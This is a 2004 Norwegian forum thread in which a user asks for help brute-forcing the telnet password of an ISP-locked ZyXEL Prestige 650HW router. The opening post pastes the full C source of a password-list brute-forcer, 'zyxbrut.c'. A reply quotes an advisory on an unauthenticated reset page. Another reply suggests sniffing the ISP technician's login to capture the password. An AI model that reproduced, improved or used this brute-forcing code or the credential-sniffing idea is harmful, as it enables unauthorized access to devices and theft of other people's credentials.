Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
AbonnerSkjul
Host1.no - Webhotell fra 29,-, virtuell server fra 249,-. 15% rabatt med rabattkode "nFF". Besøk oss på Host1.no!
  12 1275
Tias
med fruktkjøtt.
Tias's Avatar
Crew
6.226 2.255
16. desember 2004
Hei,

Jeg trenger hjelp med å bruteforce en ZyXEL Prestige 650HW-33 router. Routeren har jeg fått gjennom mitt abbonement hos BKK, men desverre så har de aktivert brukernavn og passord så jeg ikke får muligheten til å forrandre IP, porter eller andre viktige NAT-innstillinger. De vil heller ikke oppgi brukernavn og passord, og for å forrandre ting i nettverket så må jeg sende mail til BKK og forhåpentligvis så gjør de det i løpet av et par dager. Ikke akkurat praktisk.

Jeg har prød et smart lite C program jeg fant på Packetstorm kalt zyxbrut.c, men dette viste seg å ikke være stort til hjelp. Programmet er et rimelig basic program som prøver en og en kombinasjon av brukernavn / passord, men desverre så har routeren en sikkerhetsfunksjon som gjør at den dreper tilkoblingen etter 4 gale passord, noe som resulterer i at programmet gir meg den kombinasjonen av brukernavn / passord det prøvde sist og påstår dette er riktig, noe det selvsagt ikke er. Det jeg må ha er et program som åpner opp en ny tilkobling etter at den første ble brutt, og fortsetter der det slapp til riktig kombinasjon er funnet. Programmet må fungere over en telnet-tilkobling, og fungere i et Linux-miljø.

Legger også ved kildekoden til zyxbrut i håp om at noen kan hjelpe meg med eventuelle feil. Forige gang jeg prøvde programmet, dvs. et halvt år siden eller så, så var det en del feil. Jeg fikk da hjelp av en bekjent over IRC, men det hjalp ikke på resultatet. Har desverre ikke den redigerte kildekoden lengre .

Takknemlig for all hjelp!

Faen, la jeg ikke med koden til zyxbrut.c? Jaja, får redigere den inn da.

/*

ZYXEL-brutuz v 1.0.0

Password-brutforcer for ZyXel Routerz...

C'ed by [ zWARYAG ] / BetaFly Computer Team

to compile : cc zyxbrut.c -o zyxbrut

Aug : 2k2

thnkzz to DruiD / BetaFly CT.



*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/socket.h>

void USAGE(void);

int main(int argc, char *argv[])
{
int port=23;
int s;
struct sockaddr_in addr;
int sock;
char pass_buf[30];
FILE *pass_filePtr;
char banner[2048];
char finder[5]="asswo";

if(argc!=3) USAGE();

if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("Socket ERROR");
exit(1);
}

addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr.s_addr = inet_addr(argv[1]);

if ((pass_filePtr=fopen(argv[2],"r"))==NULL) {
printf("[ERROR] '%s' could not be opened!\n",argv[2]);
exit(1);
}


fscanf(pass_filePtr,"%s", pass_buf);

while(!feof(pass_filePtr)) {

if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1) {
perror("Socket ERROR");
exit(1);
}

if ((connect(sock,(struct sockaddr *) &addr, sizeof(addr))) == 0) {

bzero(banner,sizeof(banner));

s=send(sock,pass_buf,sizeof(pass_buf),0);
read(sock,banner,sizeof(banner));

s=send(sock,"\n",sizeof("\n"),0);
read(sock,banner,sizeof(banner));

if(strstr(banner,finder)) printf("%s\n",pass_buf);
else {
printf("\nOK! Password iz : %s\n",pass_buf);
close(sock);
exit(0);
}

}

fscanf(pass_filePtr,"%s", pass_buf);
close(sock);
}

return 0;
}


void USAGE()
{
printf("\n");
printf(" ZyXel-Brutuz v.1.0 by [zWARYAG] / BetaFly Computer Team\n");
printf(" Uze : zyxbrut <ip-addr> <passlizt>\n");
printf("\n");
exit(0);
}
Vis hele sitatet...
Sist endret av Tias; 16. desember 2004 kl. 21:08.
Nix
Nix's Avatar
118 0
16. desember 2004
Jeg går ut fra at du har fysisk til gang til boxe.

Les Bruker Guiden fra Zyxel, så finner du en måte å "Restore Factory Defaults" slik at Passord blir satt til "1234"

ftp://ftp.zyxel.com/p650HWseries/doc...UsersGuide.pdf
cyberdog
cyberdog's Avatar
161 0
16. desember 2004
mener å huske det var en auth bug i prestige serien..

fra bugtraq

Hi, I found a bug in ZyXEL Prestige 650 HW Routers with Http Remote Administration active.

Exploting this bug, the attacker can reset the router configurantion.

The "/rpFWUpload.html" is not password protected. To exploit this bug you only need write that:

http://[Router ip]/rpFWUpload.html

and click the Reset button.
Vis hele sitatet...
Kanskje dårlig ide hvis du mister configen din fra bkk..
Sist endret av cyberdog; 16. desember 2004 kl. 21:00.
Tias
med fruktkjøtt.
Tias's Avatar
Trådstarter Crew
6.226 2.255
16. desember 2004
Hmm, burde kanskje nevnt at det ikke hjelper å resette routeren til defaults, da denne da blir ukonfigurert og jeg ikke kommer meg på BKKs nett. Routeren var ukonfigurert når jeg fikk den, og jeg fikk hjelp fra ZyXEL / BKK til å stille denne riktig inn.

Routeren ble så sperret via internett så snart jeg hadde fått den opp på nett.
Tias
med fruktkjøtt.
Tias's Avatar
Trådstarter Crew
6.226 2.255
16. desember 2004
cyberdog: Takk, men som sagt må jeg ha en exploit / et program som fungerer per telnet, da de også har disablet / sperret HTTP.
Nix
Nix's Avatar
118 0
16. desember 2004
Bruker det eksisterende programmet telnet? i såfall så er det vel ganske enkelt og skrive om programmet til å koble opp på nytt etter endte 4 forsøk.
kinder
kinder's Avatar
6 0
16. desember 2004
har hatt den ruteren i 1uke
synes den funker fint. husk at alle datamasjinene må vær i same
orkgrup










edit. sorri kom borti ebter kanpen lit for fort.
Tias
med fruktkjøtt.
Tias's Avatar
Trådstarter Crew
6.226 2.255
16. desember 2004
Nix: Det er mulig, men jeg kan ikke C.

kinder: ?
Nix
Nix's Avatar
118 0
16. desember 2004
Lastet ned programmet nå.

Det så ganske enkelt ut, men jeg har desverre ingen zyxel (eller annen box med telnet server) å prøve på så da er jeg desverre tom for ideer... Beklager.

Pokkern at jeg er en sånn windows hore.......
Tias
med fruktkjøtt.
Tias's Avatar
Trådstarter Crew
6.226 2.255
17. desember 2004
Nå blir jeg borte over helgen, men hvis noen har noen gode råd, egen erfaring med bruteforcing av router eller rett og slett vet om et program som kan stilles inn så det kobler opp etter brutt tilkobling og fortsetter der det slapp så hadde jeg vært evig takknemlig. Tror BKK jævlene har låst noen porter for meg igjen.

Nix: Hehe, takk for hjelpen uansett
▼ ... noen uker senere ... ▼
cyberdog
cyberdog's Avatar
161 0
6. januar 2005
Hva med å sette opp en sniffer, ringe de og be de åpne en port eller noe så vil du få passordet når de logger inn. Vet ikke hvordan det blir å sniffe fra wan porten men det er sikkert mulig
neurotor
root
neurotor's Avatar
431 61
6. januar 2005
Ta å reset routeren å ring dem å si at den ikke funker... Så må du vel konfigurere den på nytt slik at dem når den og kan sperre den via internett. Så husker du / skriver opp innstillingene dem gir deg. Det er egentlig bare noen få innstillinger som må stemme for at det skal funke. VC/LPI - verdiene (om jeg husket rett nå). Samt protokoll. Bare husk å sperr for web / telnet administrasjon fra internett / wan porten.
Tias
med fruktkjøtt.
Tias's Avatar
Trådstarter Crew
6.226 2.255
6. januar 2005
neurotor: Det er en god idé, men jeg lurer på om de ikke tar betalt for slike tjenester nå. Uansett, tror jeg stresser litt mer med bruteforcing før jeg prøver meg på noe slikt.

cyberdog: Hmm, kanskje det var en mulighet. Takk for tips